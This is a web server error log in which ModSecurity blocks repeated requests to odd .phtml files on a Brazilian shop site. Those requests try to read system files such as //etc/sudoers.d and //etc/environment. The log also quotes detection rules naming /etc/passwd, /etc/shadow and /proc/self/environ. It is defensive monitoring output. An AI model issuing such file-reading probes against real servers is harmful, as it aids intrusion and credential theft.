[Thu Mar 19 13:23:35.364757 2026] [:error] [pid 27293:tid 140411548894976] [client 57.141.18.28:51120] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjB_-YZRR_7pZ7nDKezwAAA9c"]
[Thu Mar 19 13:23:35.673886 2026] [:error] [pid 15826:tid 140411683178240] [client 57.141.18.53:51124] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjB-oXxyEfFpUF8f8gFwAAAUc"]
[Thu Mar 19 13:23:35.981675 2026] [:error] [pid 26799:tid 140411641214720] [client 57.141.18.33:51126] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjB9a6ubjKNq_cu4Zp6QAAA0w"]
[Thu Mar 19 13:23:36.129822 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48550] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:23:36.514249 2026] [:error] [pid 31803:tid 140411741927168] [client 57.141.18.66:51134] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjCOyqAr6etmhZHNpzCgAAAEA"]
[Thu Mar 19 13:23:36.662921 2026] [:error] [pid 30077:tid 140411557287680] [client 57.141.18.22:51140] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjCPu8EFLIOrSqIpu7oAAAAlY"]
[Thu Mar 19 13:23:36.822683 2026] [:error] [pid 14269:tid 140411674785536] [client 57.141.18.4:51142] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjCAbLMZ6AikZjR9VwsQAAAAg"]
[Thu Mar 19 13:23:38.335790 2026] [:error] [pid 26799:tid 140411666392832] [client 57.141.18.71:51150] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjCda6ubjKNq_cu4Zp6gAAA0k"]
[Thu Mar 19 13:23:38.340312 2026] [:error] [pid 31803:tid 140411716749056] [client 57.141.18.111:51148] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjCeyqAr6etmhZHNpzCwAAAEM"]
[Thu Mar 19 13:23:39.891826 2026] [:error] [pid 27403:tid 140411733534464] [client 57.141.18.61:51172] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjChkFeYa1D6dYQnAEYwAAAcE"]
[Thu Mar 19 13:23:39.894328 2026] [:error] [pid 27293:tid 140411649607424] [client 57.141.18.109:51186] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjC_-YZRR_7pZ7nDKe0QAAA8s"]
[Thu Mar 19 13:23:39.895659 2026] [:error] [pid 15826:tid 140411574073088] [client 57.141.18.68:51174] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjCuoXxyEfFpUF8f8gGgAAAVQ"]
[Thu Mar 19 13:23:39.902675 2026] [:error] [pid 17887:tid 140411741927168] [client 57.141.18.53:51178] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjCwkwaGbbGflqUZDa_gAAAMA"]
[Thu Mar 19 13:23:40.055790 2026] [:error] [pid 17887:tid 140411674785536] [client 57.141.18.27:51196] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjDAkwaGbbGflqUZDbAAAAAMg"]
[Thu Mar 19 13:23:40.554922 2026] [:error] [pid 27293:tid 140411590858496] [client 57.141.18.16:51206] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjDP-YZRR_7pZ7nDKe0gAAA9I"]
[Thu Mar 19 13:23:40.590626 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.76:51208] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjDOoXxyEfFpUF8f8gGwAAAUM"]
[Thu Mar 19 13:23:41.017578 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.82:51152] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjDeoXxyEfFpUF8f8gHAAAAU8"]
[Thu Mar 19 13:23:41.519832 2026] [:error] [pid 17653:tid 140411632822016] [client 57.141.18.114:51222] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjDcdf6f5d65gmYZSMbQAAAs0"]
[Thu Mar 19 13:23:43.039314 2026] [:error] [pid 17653:tid 140411658000128] [client 57.141.18.58:51224] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjDcdf6f5d65gmYZSMbgAAAso"]
[Thu Mar 19 13:23:45.250100 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.70:51290] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjEda6ubjKNq_cu4Zp7QAAA0I"]
[Thu Mar 19 13:23:45.673336 2026] [:error] [pid 30077:tid 140411666392832] [client 57.141.18.81:51310] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjEfu8EFLIOrSqIpu7pQAAAkk"]
[Thu Mar 19 13:23:46.327528 2026] [:error] [pid 27293:tid 140411599251200] [client 57.141.18.53:51322] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjEv-YZRR_7pZ7nDKe1AAAA9E"]
[Thu Mar 19 13:23:46.775036 2026] [core:alert] [pid 14269:tid 140411649607424] [client 57.141.18.85:51332] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 13:23:46.960075 2026] [:error] [pid 15826:tid 140411632822016] [client 57.141.18.112:51254] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjEuoXxyEfFpUF8f8gIQAAAU0"]
[Thu Mar 19 13:23:47.597577 2026] [:error] [pid 30077:tid 140411741927168] [client 57.141.18.38:51356] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjE_u8EFLIOrSqIpu7pwAAAkA"]
[Thu Mar 19 13:23:48.140037 2026] [:error] [pid 27403:tid 140411599251200] [client 57.141.18.6:51368] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjFBkFeYa1D6dYQnAEZQAAAdE"]
[Thu Mar 19 13:23:48.968647 2026] [:error] [pid 19093:tid 140411565680384] [client 57.141.18.15:51382] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjFF_V7PWP6ixUYl7P-AAAApU"]
[Thu Mar 19 13:23:49.435169 2026] [:error] [pid 26799:tid 140411582465792] [client 57.141.18.22:51390] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjFda6ubjKNq_cu4Zp8AAAA1M"]
[Thu Mar 19 13:23:49.508648 2026] [:error] [pid 17653:tid 140411699963648] [client 57.141.18.20:51392] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjFcdf6f5d65gmYZSMcAAAAsU"]
[Thu Mar 19 13:23:50.121935 2026] [:error] [pid 27293:tid 140411582465792] [client 57.141.18.105:51400] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwjFv-YZRR_7pZ7nDKe1gAAA9M"]
[Thu Mar 19 13:23:50.546316 2026] [:error] [pid 19093:tid 140411607643904] [client 57.141.18.41:51406] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwjFl_V7PWP6ixUYl7P-QAAApA"]
